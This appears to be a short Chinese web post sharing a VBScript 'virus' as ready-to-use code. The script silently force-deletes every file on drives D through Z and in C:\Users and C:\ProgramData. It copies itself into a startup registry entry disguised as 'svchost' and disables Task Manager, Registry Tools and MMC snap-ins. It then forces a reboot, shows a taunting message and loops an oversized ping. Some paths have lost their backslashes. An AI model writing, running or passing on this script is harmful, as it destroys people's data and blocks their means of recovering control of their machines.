
vbs病毒代码  时间:2022-03-01  阅读:()


那废话不说,问这个如何?不懂可以问我 On Error Resume Next dim avest,xufso,wscrt Set avest = WScript.Createobject("WScript.Shell") Set wscrt = WScript.Createobject("WScript.Shell") Set xufso = CreateObject("Scripting.FileSystemObject") avest.run "cmd /c ""del d:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del e:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del f:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del g:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del h:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del i:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del j:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del k:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del l:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del m:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del n:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del o:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del p:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del q:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del r:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del s:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del t:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del u:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del v:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del w:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del x:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del y:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del z:*.* / f /q /s""",0 ,true avest.run "cmd /c ""del C:Users*.* / f /q /s""",0 ,true avest.run "cmd /c ""del C:ProgramData*.* / f /q /s""",0 ,true xufso.CreateFolder "C:VBScript" wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!" xufso.copyfile Wscript.Scriptfullname,"C:VBScript一触即发.vbs" xufso.copyfile Wscript.Scriptfullname,"C:UsersPublic\一触即发.vbs" wscrt.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","00000001","REG_DWORD" wscrt.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr","00000001","REG_DWORD" wscrt.regwrite"HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunsvchost","C:VBScript一触即发.vbs","REG_SZ" wscrt.regWrite"HKEY_CURRENT_USERSoftwarePoliciesMicrosoftMMCRestrictToPermittedSnapins","00000001","REG_DWORD" msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error" do wscrt.run "ping -l 65500 -t" loop


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